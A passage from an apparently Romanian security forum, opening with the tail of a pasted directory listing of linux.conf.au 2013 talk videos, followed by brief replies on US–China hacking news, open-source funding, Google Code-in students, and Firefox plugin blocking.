right]02-Feb-2013 23:11 [/TD] [TD=align: right] 72M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RAID_is_more_than_parity_and_mirrors.mp4[/TD] [TD=align: right]04-Feb-2013 10:04 [/TD] [TD=align: right]122M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: 
right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4[/TD] [TD=align: right]02-Feb-2013 19:12 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4[/TD] [TD=align: right]02-Feb-2013 20:04 [/TD] [TD=align: right] 90M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ript_a_terse_but_expressive_DSL_for_iptables.mp4[/TD] [TD=align: right]02-Feb-2013 21:40 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ristretto_runtime_types_for_JavaScript.mp4[/TD] [TD=align: right]03-Feb-2013 17:00 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Scratching_your_own_itch_subsurface_diving_log.mp4[/TD] [TD=align: right]03-Feb-2013 15:24 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Shell_for_Starters.mp4[/TD] [TD=align: right]04-Feb-2013 12:09 [/TD] [TD=align: right]135M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Software_Transactional_Memory_in_GCC_47.mp4[/TD] [TD=align: right]03-Feb-2013 17:14 [/TD] [TD=align: right]151M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Stereographic_film_making_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 23:09 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Systems_Administration_Server_and_Process_Behavior.mp4[/TD] [TD=align: right]03-Feb-2013 01:08 [/TD] [TD=align: right]282M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_Robotics_and_Embedded_Computing_with_Legos_and_Arduino.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right] 41M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Teaching_the_X_server_new_tricks.mp4[/TD] [TD=align: right]04-Feb-2013 09:38 [/TD] [TD=align: right]102M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_IPocalypse_20_months_later.mp4[/TD] [TD=align: right]02-Feb-2013 19:25 [/TD] [TD=align: right]177K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Perl_Renaissance.mp4[/TD] [TD=align: right]02-Feb-2013 20:17 
[/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_Raspberry_Pi_and_Linux.mp4[/TD] [TD=align: right]02-Feb-2013 21:45 [/TD] [TD=align: right]159M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_future_of_nonvolatile_memory.mp4[/TD] [TD=align: right]02-Feb-2013 19:24 [/TD] [TD=align: right] 49M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]The_real_story_behind_Wayland_and_X.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Theres_a_Party_In_Your_Box_And_Everyones_Invited.mp4[/TD] [TD=align: right]02-Feb-2013 21:21 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Think_Create_Critique_Design.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Touch_and_Go_Modern_User_Interfaces_with_Open_Source.mp4[/TD] [TD=align: right]02-Feb-2013 23:18 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Transcendent_Memory_Not_Just_for_Virtualization_Anymore.mp4[/TD] [TD=align: right]03-Feb-2013 18:40 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Trinity_A_Linux_kernel_fuzz_tester_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 00:37 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Two_years_of_LibreOffice.mp4[/TD] [TD=align: right]03-Feb-2013 00:48 [/TD] [TD=align: right]109M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UEFI_the_Converged_Firmware_Infrastructure.mp4[/TD] [TD=align: right]02-Feb-2013 21:48 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_Puppet_to_Model_Application_clusters.mp4[/TD] [TD=align: right]04-Feb-2013 10:23 [/TD] [TD=align: right]101M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Using_open_source_in_over_1100_schools_in_New_Zealand.mp4[/TD] [TD=align: right]02-Feb-2013 21:49 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Vampire_Mice_How_USB_PM_impacts_you.mp4[/TD] [TD=align: right]02-Feb-2013 
23:03 [/TD] [TD=align: right]121M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Why_kernel_space_sucks.mp4[/TD] [TD=align: right]03-Feb-2013 15:51 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Wiggle_while_you_work.mp4[/TD] [TD=align: right]03-Feb-2013 13:48 [/TD] [TD=align: right] 92M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]gitannex.mp4[/TD] [TD=align: right]03-Feb-2013 18:29 [/TD] [TD=align: right] 61M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]redgrep_from_regular_expression_derivatives_to_LLVM.mp4[/TD] [TD=align: right]02-Feb-2013 18:58 [/TD] [TD=align: right] 60M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]users_delighted_better_UX_using_CSS_3_in_particular_and_HTML5_in_general.mp4[/TD] [TD=align: right]03-Feb-2013 14:37 [/TD] [TD=align: right] 94M[/TD] [TD] [/TD] [/TR] [TR] [TH=colspan: 5] [/TH][/TR] [/TABLE] Sursa: Index of /linux.conf.au/2013/mp4
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Stiri securitate
Chinese experts slam U.S. hacking accusations - People's Daily Online US military advisor calls for McKinnon pardon, recruitment of "master hackers" • The Register https://www.computerworld.com/s/article/9236535/President_can_order_preemptive_cyberattacks_if_needed 'Chinese still hacking us,' says Wall Street Journal owner | Security & Privacy - CNET News -
Yes, you're right, work for little money. But let's not forget that open source does not mean a lack of funding. The big companies that practically make money off open-source projects pay people to work on those projects. One example would be Intel, and an example project is the Linux kernel itself. If their processors didn't work on Linux it would be bad, so they invest in kernel programmers. It's much the same with other projects; in some cases donations or sponsorships are added on top, as with OpenSSL, which is waiting for sponsorships of 50K dollars. But if we pay attention, we notice that it offers FIPS support, a certification that costs about 50K dollars. What can be useful for these young people, besides the fact that they learn many new and useful things, is that they end up working at big companies like Google, which will treat them well.
-
The US could respond in kind to China's IT attacks
Nytro replied to Matt's topic in Stiri securitate
Ooh, shit just got serious... We have the two camps: 1. The Chinese, with that old joke: how do the Chinese crack a password? Each one tries one. In other words, there are a lot of them -> potential. 2. The Americans, who are guys with money and can pay some Indians 2 dollars a year to do their dirty work. Who are you betting on? -
From Jurnalul, the same news: "The 334 participating students from 36 countries had to solve 1925 different tasks and assignments proposed by the open source organizations" "The 20 solved 576 tasks, announces Google Open Source" Apparently he worked on BRL-CAD | Open Source Solid Modeling . I'm curious whether these initiatives are OK, or whether the companies are just getting some kids to do their work. It seems the other projects there included Fedora, NetBSD, KDE and Haiku. Interesting.
-
Firefox will block any content based on Java, Reader and Silverlight
Nytro replied to Matt's topic in Stiri securitate
HTML 5 is coming and there will be no more need for Java or Flash. -
SSL - Bridges between secure and insecure
Nytro replied to unixbreak's topic in Tutoriale in engleza
Yes, nice article